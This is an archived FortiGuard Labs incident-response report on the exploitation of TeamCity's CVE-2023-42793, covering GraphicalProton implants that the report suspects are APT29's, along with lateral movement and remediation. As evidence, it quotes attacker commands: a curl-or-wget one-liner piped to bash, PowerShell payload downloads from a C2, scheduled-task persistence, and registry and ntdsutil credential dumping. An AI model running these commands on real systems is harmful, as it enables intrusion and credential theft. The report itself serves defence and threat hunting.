{
	"id": "13181762-6d36-4cd1-8760-41d89633ba12",
	"created_at": "2026-04-06T00:12:16.389047Z",
	"updated_at": "2026-04-10T03:37:32.963821Z",
	"deleted_at": null,
	"sha1_hash": "ed410e4ea8da7382544bb0e3567539523930b0d6",
	"title": "TeamCity Intrusion Saga: APT29 Suspected Among the Attackers Exploiting CVE-2023-42793 | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9207821,
	"plain_text": "TeamCity Intrusion Saga: APT29 Suspected Among the Attackers\r\nExploiting CVE-2023-42793 | FortiGuard Labs\r\nPublished: 2023-12-13 · Archived: 2026-04-05 17:30:17 UTC\r\nAffected Platforms: Machines running vulnerable JetBrains TeamCity versions (before 2023.05.4, per vendor advice)\r\nThreat Type: Remote Code Execution Vulnerability\r\nImpact: Remote code execution for unauthenticated users, enabling initial access to vulnerable servers\r\nSecurity Level: High\r\nCyber Kill Chain®\r\nIntroduction\r\nOn September 6, 2023, researchers from Sonar discovered a critical vulnerability in TeamCity On-Premises (CVE-2023-42793[1]).[2]\r\nTeamCity is a build management and continuous integration server from JetBrains[3]. On September 27,\r\n2023, a public exploit for this vulnerability was released by Rapid7[4]. This critical vulnerability was given a CVSS score of\r\n9.8, most likely because an unauthenticated attacker can use the publicly available exploit to achieve remote code\r\nexecution on the victim server with a basic web request to any reachable web server hosting the vulnerable application.\r\nThis vulnerability has been observed being actively exploited in the wild and was added to CISA's 'Known Exploited\r\nVulnerabilities Catalog' on October 4, 2023.[5]\r\nIn mid-October 2023, the FortiGuard Incident Response (IR) team sent a courtesy notification to an organization that had\r\nbeen compromised due to this vulnerability. This organization engaged the FortiGuard IR team to investigate the malicious\r\nactivity in their network.\r\nThe victim was a US-based organization in the biomedical manufacturing industry. Our subsequent investigation determined\r\nthat initial access for the attack was through the exploitation of the CVE-2023-42793 TeamCity vulnerability using a\r\ncustom-built exploit script written in Python. The behavior of the malware used in post-exploitation matches the\r\nGraphicalProton malware used by APT29. 
This article breaks down our investigation and the outcome of our containment,\r\neradication, and remediation efforts. As part of this analysis, we look at threat actor TTPs employed throughout the intrusion\r\nand how they were identified and pieced together by the FortiGuard IR team. MITRE ATT\u0026CK mapping and observables\r\nare provided at the end of the article, alongside IOCs and FortiEDR Threat Hunting queries, to assist with threat-hunting\r\nactivities for similar behavior.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 1 of 31\n\nSummary of Attack\r\nFigure 1: The attack timeline of TeamCity intrusion described in this article.\r\nAnalysis\r\nVulnerability Exploitation\r\nAs part of our initial customer engagement, we examined several EDR events reported from one of the victim's Windows\r\napplication servers (HOST_1_TEAMCITY). During a scoping call, the FortiGuard IR team identified that one of the\r\napplications hosted on this server was TeamCity. The victim had only recently updated the application to a non-vulnerable\r\nversion.\r\nWe began by retrieving application and system logs from the suspected compromised server (HOST_1_TEAMCITY). On\r\nanalysis of the application logs, we identified significant evidence of successful exploitation of the TeamCity vulnerability.\r\nThe authentication bypass can be observed in the screenshot of the teamcity-auth.log file, shown in Figure 2.\r\nFigure 2: A snippet of the 'teamcity-auth.log' screenshot highlighting the TeamCity exploit evidence and associated remote\r\nIP.\r\nAnalysis of these logs showed that this vulnerability had been exploited multiple times over a relatively short period, with\r\nconnections originating from multiple unique public IP addresses. 
The teamcity-auth.log (authentication events log)\r\nidentifies successful exploitation but does not provide details on commands executed through exploitation. This information\r\nis available in the separate 'teamcity-server.log' file, a general server log for the TeamCity software. Analyzing entries in this log file\r\nfrom around the same time confirmed attempted remote code execution on the same host. For example, the IP address 167[.]179[.]75[.]213\r\ntaken from the highlighted log entry in Figure 2 was correlated with the echo command execution log highlighted in the\r\n'teamcity-server.log' entry in Figure 3. Details of the external command execution from the 'teamcity-server.log' file can also\r\nbe seen in Figure 3.\r\nFigure 3: A snippet of the 'teamcity-server.log' showing remote code execution evidence, including the associated command\r\nexecuted through the exploitation.\r\nFurther analysis of the various commands executed on the vulnerable server through this RCE exploit led the IR team to\r\nbelieve multiple threat actors were conducting simultaneous operations. 
Some commands executed as part of this intrusion\r\nare shown in Table 1.\r\nRemote IP Address Commands Executed\r\n167[.]179[.]75[.]213 Command line: whoami\r\n154[.]26[.]133[.]111 Command line: bash -c \"nproc 2\u003e\u00261\"\r\n104[.]207[.]152[.]236 Command line: cmd.exe \"/c whoami\"\r\n104[.]207[.]152[.]236 Command line: cmd.exe \"/c ipconfig /all\"\r\n104[.]207[.]152[.]236 Command line: cmd.exe \"/c ipconfig /displaydns\"\r\n104[.]207[.]152[.]236 Command line: cmd.exe \"/c hostname\"\r\n74[.]207[.]242[.]113 Command line: cmd.exe \"/c tasklist /svc\"\r\n74[.]207[.]242[.]113 Command line: cmd.exe \"/c netstat -ano\"\r\n74[.]207[.]242[.]113 Command line: cmd.exe \"/c net user /domain\"\r\n212[.]113[.]106[.]100 Command line: uname -a\r\n212[.]113[.]106[.]100 Command line: cmd.exe /c whoami\r\n212[.]113[.]106[.]100 Command line: cmd.exe /c systeminfo\r\n212[.]113[.]106[.]100 Command line: cmd.exe /c net user\r\n212[.]113[.]106[.]100 Command line: cmd.exe /c \"echo 167043640 \u003e C:/Windows/Temp/0\"\r\n43[.]248[.]34[.]77 Command line: echo 2W1EVQsV5piPbyW6FSsNC8D7irR\r\n103[.]89[.]13[.]155 Command line: echo 2W28BTpkdCjcRPQNkSF5qFCphlG\r\n195[.]246[.]120[.]4 Command line: echo 2W28BTpkdCjcRPQNkSF5qFCphlG\r\n20[.]222[.]6[.]225 Command line: echo 2W2GZqAg8k6ipgBTcHyK5wABDSW\r\n45[.]133[.]7[.]129 Command line: cmd.exe /c echo 9fW99pdqfpXU21zd\r\n45[.]133[.]7[.]154 Command line: cmd.exe \"/c net user \u003credacted\u003e \"\u003cpassword redacted\u003e\" /add\"\r\n45[.]133[.]7[.]154 Command line: cmd.exe \"/c echo \u003credacted\u003e | c:\\TeamCity\\bin\\anydesk.exe --set-password\"\r\n45[.]133[.]7[.]156 Command line: wget --no-check-certificate https[:]//fisheries-states-codes-camps.trycloudflare[.]com/rcu\r\n45[.]133[.]7[.]124 Command line: /bin/sh -c \"(curl -s 194.38.22[.]53/tc.sh||wget -q -O- 
194.38.22[.]53/tc.sh)|bash\"\r\nTable 1. Commands executed by multiple threat actors on the TeamCity software host HOST_1_TEAMCITY.\r\nLooking critically at some of the attempted commands, it appears that some of the threat actors successfully exploited the\r\nvulnerability but were unsuccessful at running Linux system commands on the victim Windows Server. An example of this\r\nbehavior can be seen in Figure 4.\r\nFigure 4: TeamCity log showing attempted Linux command execution by a threat actor following successful vulnerability\r\nexploitation.\r\nIt appears that several of the commands from various remote IPs may have been associated with the use of the open-source\r\nvulnerability scanner Nuclei[6]. The IR team found a Nuclei template (CVE-2023-42793.yaml) designed to identify the\r\npresence of the TeamCity vulnerability in Nuclei's official template repository[7]. The YAML template file contains the\r\nfollowing line:\r\nPOST /app/rest/debug/processes?exePath=echo\u0026params={{randstr}} HTTP/1.1\r\nThe resulting request would produce an echo command on a successfully exploited TeamCity server, identical to the echo\r\ncommands observed in the victim's TeamCity logs. The IR team collated information from both logs to better understand the\r\ncorrelations between when the echo commands were executed and the associated network connections from the numerous\r\npublic IP addresses. A snippet of this correlation is shown in Figure 5, where the echo commands generated by some of the\r\nNuclei scanning are also highlighted.\r\nFigure 5: A snippet of correlated logs showing network connections and subsequent commands. 
Highlighted are multiple\r\necho commands indicative of likely Nuclei scanning.\r\nAt this stage of the intrusion, it became clear that multiple threat actors were scanning for the vulnerability, validating if it\r\ncould be exploited, and attempting to establish a foothold using the related exploitation. The following section of this report\r\nfocuses on the activities of one of these threat actors, distinct from the other threat actor activity. We will refer to this culprit as\r\nthe 'main threat actor.' The activities conducted by other threat actors exploiting this vulnerability are covered\r\nmore extensively in the later 'Other Threat Actors Activity' section.\r\nMain Threat Actor Intrusion\r\nThe first activity attributed to the main threat actor was the execution of an echo command like those discussed above,\r\nindicating that the main threat actor likely employed Nuclei to identify potential victims. After this initial command, the\r\nmain threat actor began executing additional discovery commands to gather system and privilege information. Some of these\r\ndiscovery commands are shown below:\r\ncmd.exe \"/c systeminfo\"\r\nwhoami\r\nipconfig /all\r\nwhoami /all\r\nThe command attributed to the Nuclei scanning and these subsequent discovery commands were linked to different\r\nremote IP addresses. However, we assessed them as being from the same actor because the activities were separated by only a few\r\nseconds. This indicates the main threat actor uses different infrastructure to scan for victims and to\r\nexecute later commands.\r\nOne command and control (C2) IP address discovered during our investigation was linked to a US-based tertiary education\r\norganization. 
Upon detection of this active exploitation, the FortiGuard IR team notified the organization that their\r\ninfrastructure may have been compromised and part of an ongoing APT29 campaign. They performed an internal\r\ninvestigation and identified exploitation of their vulnerable TeamCity server associated with the previously identified IP\r\naddress. As part of this exploitation, the main threat actor used the TeamCity exploit to install an SSH certificate, which they\r\nthen used to maintain access in this second victim's environment. The organization's security team provided additional\r\ninformation to the FortiGuard IR team, who then identified that the source of the attack on the educational organization was\r\na TOR exit node. To protect their identity, this report does not include details of the victim whose infrastructure was used as a relay. They have\r\nsuccessfully remediated their environment and patched the associated vulnerability.\r\nAfter executing the discovery commands outlined above, the main threat actor attempted to download a DLL file,\r\n'AclNumsInvertHost.dll,' on the TeamCity host using PowerShell and the 'Invoke-WebRequest' cmdlet. The actor used the\r\nfollowing command to download the file:\r\npowershell -exec bypass -c \"Invoke-WebRequest -Uri\r\nhxxp[:]//103[.]76[.]128[.]34:8080/AclNumsInvertHost.dll -OutFile\r\nC:\\Windows\\System32\\AclNumsInvertHost.dll\"\r\nAfter successfully downloading this DLL file on the HOST_1_TEAMCITY, the main threat actor again used the TeamCity\r\nRCE vulnerability to create a Windows scheduled task referencing this DLL file. They likely did this for persistence and to\r\nabstract their execution from the TeamCity exploitation. 
The actor used the following command to create the scheduled task:\r\nschtasks.exe /create /SC ONLOGON /tn\r\n\"\\Microsoft\\Windows\\DefenderUPDService\" /tr\r\n\"\\\"C:\\Windows\\system32\\rundll32.exe\\\"\r\n\\\"C:\\Windows\\system32\\AclNumsInvertHost.dll\\\",AclNumsInvertHost\"\r\nWe recovered the associated Windows task file from the victim TeamCity server (HOST_1_TEAMCITY), confirming that\r\nthe command in the TeamCity log had been successfully executed and the scheduled task was created. The retrieved\r\nWindows task data is shown in Figure 6:\r\nFigure 6: Windows task created by threat actor for the persistence of a DLL file.\r\nAfter successfully creating the scheduled task, the actor attempted to execute the newly created task using the following\r\ncommand, again executed through the TeamCity RCE vulnerability on the HOST_1_TEAMCITY:\r\nschtasks.exe /run /tn \"\\Microsoft\\Windows\\DefenderUPDService\"\r\nAnalyzing the scheduled task and its method of creation, we noticed two main indicators of interest: the URL\r\n'hxxp[:]//103[.]76[.]128[.]34:8080/AclNumsInvertHost.dll' and the file 'AclNumsInvertHost.dll.' We then analyzed the URL\r\nreferenced for downloading this payload. At the time of the incident, there was limited open-source information on the IP\r\ncontained in the URL or associated URLs. However, the certificate used on the web server hosted at this IP was of interest.\r\nThe certificate had expired and carried the common name '*.ultasrv[.]com'. This common name does not appear to be associated with\r\na legitimate organization[8]. The entity associated with ultasrv[.]com seems to be a VPS (Virtual Private Server) provider.\r\nLooking more closely at the web server itself, we identified that it had an accessible open directory service. 
We then used this\r\naccess to identify additional payloads hosted by the associated threat actor. The files on the server can be seen in Figure 7.\r\nFigure 7: Files from the opendir listing of the C2 server used by the threat actor associated with TeamCity exploitation.\r\nSome information on the hosted files is provided in Table 2, along with associated file hashes.\r\nSr. No. Filename Description SHA1 Hash\r\n1 a.zip Contains the rr.exe file e3a34930e5a814db0b5d0ac7c313cfb1c294b39e\r\n2 AclNumInvertHost.dll Malicious DLL d4411f70e0dcc2f88d74ae7251d51c6676075f6f\r\n3 ehttpserver.py Python HTTP server source code 5d3b03d7e74e7c378b25f53d1fc3605776edbcaf\r\n4 iis.zip Contains iisexpresstray.exe, mscoree.dll, mscorees.dll abc50465a4b4108765a6cd6006c772fabd048458\r\n5 iisexpresstray.exe Legitimate executable from Microsoft that is part of IISExpress setup/installer c7f2137331105686aa4eb39bcfe1bae23fa19956\r\n6 jaspic-providers.xml Apache Tomcat configuration file ed6c18c49a8bde1170c97698aeb1b85292a1967d\r\n7 mscoree.dll Legitimate DLL file from Microsoft ada02e4442daa69427a2815a8819f3a1285ad772\r\n8 mscorees.dll Malicious DLL 2df317b8a408d2ad5c94b9de6f20bbef03e46066\r\n9 omzu5a.ar Unknown file detected as data file 38860565592ce018b415ecd72bc2fb1a0742702c\r\n10 pdhui_1.dll Malicious DLL 5ce062f210e1a5026cb53e9949865312ee477e3c\r\n11 poc.py PoC Python code used by the actor to exploit TeamCity vulnerability CVE-2023-42793 bcbadf744954660f9a46324649eda6a14d724cbc\r\n12 rr.exe Unknown executable 18192bb4aaa1b72104be4d26460b55f31ca65baf\r\n13 server.py Python HTTP server code b2829fd893f26cb513018c4e03428f1ef5915da0\r\n14 sudoers Linux sudoers config file d3a19eb3db9f7fe8d984e124da95a4c1cafa332e\r\n15 winmms.dll Malicious DLL 3a32e516c037c37f7bf83171e167511ba53870a7\r\n16 winmm.dll Legitimate DLL file from Microsoft d5cc1f2549fa138a931ad43d5d81d3a367c0de6e\r\n17 zabbix.zip Contains pdhui_1.dll (a malicious DLL) and other legitimate Zabbix (open-source monitoring software) files 281bb0dadc789b89f7ae30d5f4bdeae57c66b0e1\r\nTable 2. Descriptions of files found on the C2 server 103.76.128[.]34.\r\nAnalysis of the code in the poc.py file identified the script as a custom Python implementation of an exploit for the\r\nTeamCity vulnerability CVE-2023-42793. You can see the request URL found in the log and the Python code used to\r\ngenerate the request in Figure 8.\r\nFigure 8: A snippet of code from poc.py found on the C2 web server, and a snippet of the TeamCity log showing a similar\r\nrequest received by the victim during exploitation.\r\nComparing the structure of a request sent using this script and the commands executed from the victim logs, it is almost\r\ncertain that this script was used to deliver the exploit to the victim TeamCity server (HOST_1_TEAMCITY). This links the\r\nIP extracted from the scheduled task (103[.]76[.]128[.]34) to the source of the exploitation from the logs shown in Figure 9\r\n(45[.]138[.]16[.]63). Using the FortiGuard Central Threat System (CTS), we could also see that the IP address associated\r\nwith the exploitation has been linked to other significant malicious activity. Of the 171 domains associated with this IP, 92\r\nhave been tagged with high confidence as malicious, and 78 have been tagged with high confidence as suspicious. 
Only one\r\nof the domains has been tagged as low risk (Figure 9).\r\nFigure 9: FortiGuard CTS information on the IP associated with the main threat actor TeamCity exploitation in the victim\r\nenvironment.\r\nThe other element of interest in the scheduled task created by the main threat actor was the DLL file,\r\n'AclNumsInvertHost.dll.' Our analysis identified that the DLL AclNumsInvertHost.dll has ten file sections. The most notable\r\nwas '.fy55f5', which is a user-modified section. This section has an MZ header (indicating it is a Windows portable\r\nexecutable), but the remainder of the code has a high entropy of 7.99, which is typically indicative of encryption. The\r\n'.fy55f5' section can be seen in Figure 10.\r\nFigure 10: Encrypted code section of the AclNumsInvertHost.dll executed as part of the main threat actor's scheduled task\r\npersistence.\r\nThe IR team believes that this '.fy55f5' section of the DLL contains the final payload, which is decrypted at runtime. There\r\nare a number of anti-debug techniques implemented within the DLL file code that inhibited dynamic analysis during the\r\nengagement. To understand the DLL functionality more quickly, we performed comprehensive Yara scanning of all the files\r\npulled from the threat actor's web server. The AclNumsInvertHost.dll library and multiple other DLL files matched on a Yara\r\nrule for a known malware family called 'GraphicalProton.' The matching Yara rule was developed by Insikt Group from\r\nRecorded Future and is based on a specific API calling method employed by previously observed GraphicalProton samples.\r\nA match for this rule is a high-confidence indicator of GraphicalProton. 
The results of the matching Yara scan are shown in\r\nFigure 11.\r\nFigure 11: Yara rule for GraphicalProton matched against multiple DLL files found on the main threat actor opendir server.\r\nThe files in Figure 11 also matched the Yara rule M_Dropper_BURNTBATTER_1, which searches for the custom Chaskey\r\nimplementation. This Yara rule was from the article, 'Backchannel Diplomacy: APT29's Rapidly Evolving Diplomatic\r\nPhishing Operations,' by Mandiant[9].\r\nGraphicalProton is malware historically employed by the group APT29. While this tooling is confidently linked to APT29\r\n(Mandiant) or BlueBravo (Recorded Future), the victimology and initial access vector employed by the main threat actor\r\nthroughout earlier stages of this intrusion do not align with currently reported APT29 campaigns. However, a previous\r\nwell-known attack from APT29 targeted the company SolarWinds, using the same TeamCity build management\r\ntool[10]. While the IR team could not attribute this activity to APT29 with high confidence, associated threat intelligence\r\nwas used to focus our investigation further.[11]\r\nAt this stage of the intrusion, FortiEDR detected and blocked this scheduled task from executing due to its suspicious use of\r\nrundll32.exe and a machine learning assessment of the previously unobserved DLL 'AclNumsInvertHost.dll.' This forced the\r\nmain threat actor to attempt alternative methods of execution.\r\nThe first alternative method was to use the TeamCity exploit on HOST_1_TEAMCITY to download the 'iisexpresstray.exe'\r\nand 'mscoree.dll' files from the same C2 through PowerShell. These two files were written to the directory\r\n'C:\\Windows\\WinStore\\'. The 'iisexpresstray.exe' file is a legitimate signed installer executable for IISExpress, a lightweight\r\nimplementation of IIS provided by Microsoft[12]. 
However, downloaded alongside this legitimate installer was\r\n'mscoree.dll,' a malicious DLL file with the same name as a legitimate DLL (T1036.005).[13] The combination of these two\r\nfiles would allow the threat actor to employ DLL search order hijacking (T1574.001)[14] to execute their malicious DLL\r\nwhen the legitimate IISExpress executable is executed.\r\nTo execute this side-loading attack, the main threat actor created another scheduled task using the following command\r\nexecuted via the TeamCity exploit:\r\nschtasks.exe /create /SC ONSTART /tn\r\n\"\\Microsoft\\Windows\\IISUpdateService\" /tr\r\n\"C:\\Windows\\WinStore\\iisexpresstray.exe\" /RU \"SYSTEM\" /f\r\nAfter the scheduled task was created, the threat actor executed the scheduled task using the following command:\r\nschtasks.exe /run /tn \"\\Microsoft\\Windows\\IISUpdateService\"\r\nWhen the 'iisexpresstray.exe' file was executed on the HOST_1_TEAMCITY, a separate thread was created by the malicious\r\nDLL file that tried to access the system credentials through lsass.exe. This attempt was also blocked by FortiEDR. This is\r\nshown in the event graph in Figure 12.\r\nFigure 12: FortiEDR blocked access to lsass.exe from iisexpresstray.exe.\r\nThe main threat actor used multiple legitimate software binaries in this attack. The list of legitimate files is shown in the table\r\nbelow. 
Some of the executables listed in Table 3 were recovered from the opendir[15] web server.\r\nSr. No. File Name Description\r\n1 iisexpresstray.exe Legitimate IIS Express exe used for the execution of malicious DLL mscorees.dll\r\n2 MpCmdRun.exe Legitimate Defender command line utility used for execution of malicious DLL MpCmdHelp.dll\r\n3 FlashUtil_ActiveX.exe Legitimate Flash exe used for the execution of malicious DLL oleac.dll\r\n4 zabbix_agentd.exe Legitimate executable from the Zabbix software used to load the malicious DLL pdhui_1.dll\r\nTable 3. List of legitimate software executables observed in the attack and on the C2 server, which are used to load malicious DLL files.\r\nSince FortiEDR blocked the execution of this second malicious DLL file, the main threat actor changed their approach and\r\nattempted to dump the registry using the Windows utility reg.exe directly through further TeamCity exploitation. Unfortunately\r\nfor the main threat actor, FortiEDR blocked this execution due to the triggered rules 'Access to Critical System Information'\r\nand 'Connection Attempt from a Hidden Process' under its 'Exfiltration Prevention' security policy. A screenshot of the\r\nrelated FortiEDR event is shown in Figure 13.\r\nFigure 13: Attempt to dump system credentials using reg.exe was blocked by FortiEDR.\r\nThese attempts represent only two of the many credential dumping techniques the threat actor attempted to employ within\r\nthe victim environment. Fortunately, the FortiEDR software installed on the majority of their endpoints, including the victim\r\nserver, blocked these techniques. The associated EDR security events also generated multiple alerts. Unfortunately, the\r\ntargeted organization made numerous broad exceptions for this malicious behavior. 
This was likely because the behavior\r\noriginated from the TeamCity application, so the events were incorrectly assessed as false positives. These exceptions are\r\noutlined below:\r\n1. allow rundll32.exe to run AclNumsInvertHost.dll when rundll32.exe is executed by cmd.exe\r\n2. allow reg.exe to run as a hidden process\r\n3. allow reg.exe to access critical system information (credential dumping)\r\n4. allow natid.sys to be loaded (a suspicious driver dropped by the threat actor)\r\n5. allow rundll32.exe to execute AclNumsInvertHost.dll and create a thread in any lsass.exe process\r\n6. allow rundll32.exe to execute AclNumsInvertHost.dll and create a thread in any svchost.exe process\r\n7. allow any execution of PowerShell and associated rule violations\r\nThese exceptions removed the constraints around the adversary's ability to fully employ their TeamCity exploitation,\r\nallowing the main threat actor to continue their execution unrestricted by FortiEDR.\r\nAfter these exceptions were set, the main threat actor was able to successfully dump the registry of the Windows host\r\nHOST_1_TEAMCITY to gain access to local user credentials (T1003.002)[16]. To achieve this, the threat actor used reg.exe\r\nto dump the SYSTEM registry hive (T1003.002[17]) using the command below:\r\nreg.exe save HKLM\\SYSTEM \"C:\\Windows\\temp\\1\\sy.sa\" /y\r\nThis can be seen in the FortiEDR Threat Hunting event shown in Figure 14.\r\nFigure 14: FortiEDR Threat Hunting event associated with the reg.exe process being used to dump the SYSTEM registry\r\nhive.\r\nAt this stage, the main threat actor continued to employ their TeamCity exploit for execution, trying alternative techniques to\r\nestablish a more robust foothold on the HOST_1_TEAMCITY. 
They used their access to create a Windows account,\r\n'oldadministrator' (T1136.001[18]), added the newly created account to the local administrators group, and made the account\r\na special account by adding it to the registry path 'NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist' with the\r\nDWORD value 0. When a Windows user account is added to this registry location with value 0, the account is not shown on\r\nthe Windows GUI login screen. This was likely done to hide their new access from direct observation\r\nby normal system users and to ensure persistence. However, the IR team did not observe the main actor ever using this newly created\r\n'oldadministrator' account. Log events associated with these activities can be observed in the teamcity-server.log snippet\r\nshown in Figure 15.\r\nFigure 15: Extract from the TeamCity application logs showing the commands used to create a new local Windows user on\r\nthe victim endpoint.\r\nAt this time, the host HOST_1_TEAMCITY was patched for CVE-2023-42793. The IR team verified the patch was\r\nsuccessful and that there was no further exploitation of this vulnerability on this host following the installation of the patch.\r\nUnfortunately, the threat actor had already created alternative access through their GraphicalProton implant and had already\r\nbegun laterally moving to other hosts within the victim network through SMB, RDP, and remote WMIC commands.\r\nThe hosts HOST_3_SVR and HOST_4_SVR were targeted using WMIC commands (T1047)[19] from the original\r\ncompromised host, HOST_1_TEAMCITY. The network connections linked to this behavior were established using explicit\r\ncredentials. This indicates that the main threat actor had successfully pulled credentials prior to this activity. 
The IR team\r\nassesses that this WMIC activity was likely conducted to execute a GraphicalProton DLL, either through rundll32 proxy execution\r\nlike that demonstrated in the previously discussed scheduled task or through search order hijacking using one of the binary\r\nand DLL pairs pulled from the main threat actor's C2 opendir web server. You can see evidence of the network connection\r\nassociated with this WMIC activity from the Windows event log in Figure 16.\r\nFigure 16: Windows log screenshot showing WMIC.exe execution remotely from HOST_1_TEAMCITY to HOST_4_SVR\r\nOn the HOST_2_SVR, the main threat actor employed a different lateral movement technique by establishing an RDP\r\nconnection from the HOST_1_TEAMCITY. This connection was used to create multiple suspicious files in the\r\n'C:\\Windows\\SchCache' directory on HOST_2_SVR. Two DLL files ('oleacc.dll' and 'oleac.dll') and one executable file\r\n('FlashUtil_ActiveX.exe') were created in this directory. When the IR team ran a Yara scan against these files, the DLL file\r\noleac.dll matched the Yara rule for GraphicalProton. The remaining files, oleacc.dll and FlashUtil_ActiveX.exe, were\r\ndetermined to be non-malicious Microsoft-signed files.\r\nThe main threat actor then created persistence for this file through a scheduled task. This time, the task was named\r\n'WindowsActiveX' and was created to execute the 'C:\\Windows\\SchCache\\FlashUtil_ActiveX.exe' file when Windows\r\nstarts. This shows the use of another legitimate executable to perform search order hijacking to load a malicious\r\nGraphicalProton DLL. 
The command used to create this scheduled task can be observed in the FortiEDR Threat Hunting\r\nevent, shown in Figure 17.\r\nFigure 17: FortiEDR Threat Hunting event showing the creation of a scheduled task for FlashUtil_ActiveX.exe\r\nIn another credential dumping attempt, the main threat actor tried to dump Active Directory credentials using the Windows\r\nutility 'ntdsutil.exe' on the host HOST_2_SVR. They tried to dump credentials using the following command:\r\nntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\\tempp' q q\r\nThis command aims to dump the ntds.dit file and the SYSTEM and SECURITY registry hives to the given\r\npath (in this case, 'C:\\tempp'). Threat actors can often dump password hashes from these files offline using tools like\r\nmimikatz.[20] FortiEDR blocked this activity, and the associated security event can be observed in Figure 18.\r\nFigure 18: Execution of ntdsutil.exe to dump ntds.dit file was blocked by FortiEDR.\r\nIn addition to this scheduled task, the IR team found another GraphicalProton DLL in the 'C:\\Program Files\\Windows\r\nDefender' directory. This directory contained an executable PE file, 'MpCmdRun.exe,' and DLL files, 'MpCmdHelp.dll' and\r\n'MpClient.dll.' One of the files (MpCmdHelp.dll) matched against the Yara rule for the malware GraphicalProton, and the\r\nsecond DLL file, MpClient.dll, is a legitimate library used by 'MpCmdRun.exe.' Like the 'FlashUtil_ActiveX.exe' example\r\ndiscussed earlier in this report, the 'MpCmdRun.exe' is a legitimate binary vulnerable to search order hijacking. The\r\n'MpCmdRun.exe' binary is an official command-line tool used to perform various operations related to Microsoft Defender\r\nAntivirus. 
The default path of this binary is ‘C:\\Program Files\\Windows Defender.’\r\nAt this investigation stage, the team performed large-scale Yara scanning to identify additional potentially compromised\r\nhosts. This scanning identified DLL files matching the GraphicalProton signature written to disk on the hosts HOST_6_SQL\r\nand HOST_7_SVR. On both hosts, a task named ‘WindowsDefenderService’ that executed the GraphicalProton DLLs was\r\ncreated, matching the tradecraft of the previously discussed scheduled tasks. One of the scheduled task files associated with\r\nthese tasks can be seen in Figure 19.\r\nFigure 19: Schedule task file for proxy execution of the malicious GraphicalProton DLL file identified on HOST_6_SQL.\r\nThe IR team also found a network login to HOST_5_SVR from the primary infected HOST_1_TEAMCITY host.\r\nShortly after this login event, an instance of rundll32 used for proxy execution of another GraphicalProton sample was\r\nstarted. However, the process crashed. This resulted in a memory dump of the rundll32.exe process. The IR team performed\r\nstrings analysis of the memory dump and found URLs of graph.microsoft[.]com and 1drv[.]ms, which are legitimate\r\ndomains related to Microsoft OneDrive operations. The IR team also found an email address (quentparoty[@]outlook.com)\r\nin the memory dump, although this indicator has not been linked to any known IOCs. However, it has been included for\r\ncompleteness. Significant strings extracted from the memory dump can be seen in Figure 20.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 17 of 31\n\nFigure 20: Strings from memory analysis of crash dump showing email address and URL of OneDrive.\r\nSimilar network indicators were identified when we executed the AclNumsInvertHost.dll file using rundll32.exe in a virtual\r\nanalysis environment. 
The IR team also observed connections to api.dropboxapi[.]com from the rundll32.exe in the Threat\r\nHunting data of the victim environment. The GraphicalProton report[21] from Insikt Group from Recorded Future showed\r\nthat researchers had previously observed GraphicalProton samples employ Microsoft OneDrive and Dropbox as part of their\r\nC2.\r\nThe malicious DLL samples were shared with analysts from the FortiGuard Forensics Team for further malware analysis.\r\nThey confirmed that the behavior of the multiple malicious DLL matches GraphicalProton malware behavior. The malicious\r\nDLL was communicating with Microsoft OneDrive, and the following information was obtained in JSON format from this\r\ncommunication.\r\nKey Value\r\n@odata.context https://graph[.]microsoft[.]com/v1.0/$metadata#users('quentparoty%40outlook[.]com')/drive/root/$entit\r\nname blatant\r\nwebUrl https://1drv[.]ms/f/s!AGVbcHFCdi2qmmw\r\ndisplayName quent-application\r\ndriveId aa2d764271705b65\r\ndriveType personal\r\nid AA2D764271705B65!106\r\nfolder name quent-application\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 18 of 31\n\npath /drive/root:/Apps/quent-application\r\nKey Value\r\n@odata.context https://graph[.]microsoft[.]com/v1.0/$metadata#users('girmisdrong%40outlook.com')/drive/root/$entity\r\nname excerpt2002VI\r\nwebUrl https://1drv[.]ms/f/s!AALb1YPGQLqThmw\r\ndisplayName GrimiApplication\r\ndriveId 93ba40c683d5db02\r\ndriveType personal\r\nid 93BA40C683D5DB02!103\r\nfolder name GrimiApplication\r\npath /drive/root:/Apps/GrimiApplication\r\nThe analyst team also observed numerous anti-debugging techniques in malicious DLL files, such as a call to\r\nNtQueryObject to look for the “DebugObject” variable. It also has strings such as “Ollydbg,” probably to check if the\r\nOllydbg.exe process is running. 
If the process is found running, the malware may then terminate itself.\r\nGiven our understanding of the main threat actor’s operations, we determined that persistence was still possible. The IR\r\nteam provided recommendations on removing existing adversary accesses and persistence. A high-level view of the\r\ncontainment and eradication actions recommended is provided below:\r\n1. Blocking the IP addresses used by threat actors\r\n2. Removing TeamCity software accounts created by threat actors\r\n3. Removing Windows accounts created by threat actors\r\n4. Removing backdoors created by threat actors\r\n5. Removing malicious files dropped by threat actors\r\nAfter the victim security team implemented these containment and remediation actions, no further malicious activity has\r\nbeen observed.\r\nOther Threat Actor Activity\r\nIn addition to the main threat actor, there were other threat actors who exploited the TeamCity vulnerability. One of these\r\nthreat actors used their RCE access through the exploit to create a new TeamCity user via the TeamCity API. They then\r\nadded the ‘System administrator’ role to this newly created user account. No evidence was found to indicate that this newly\r\ncreated account was ever used once it was created. Logs related to this activity were recorded in the teamcity-server.log and\r\ncan be seen in Figure 21.\r\nFigure 21: TeamCity log showing the creation of a new user and assigning an admin role to the user.\r\nAnother threat actor separately attempted to download and execute an executable from an Amazon S3 bucket. Using an\r\nAmazon S3 Bucket instead of a separate C2 for file downloads differs from the actions of the main threat actor. This is\r\nsignificant, as many organizations include Amazon Services URLs in their allowlist. 
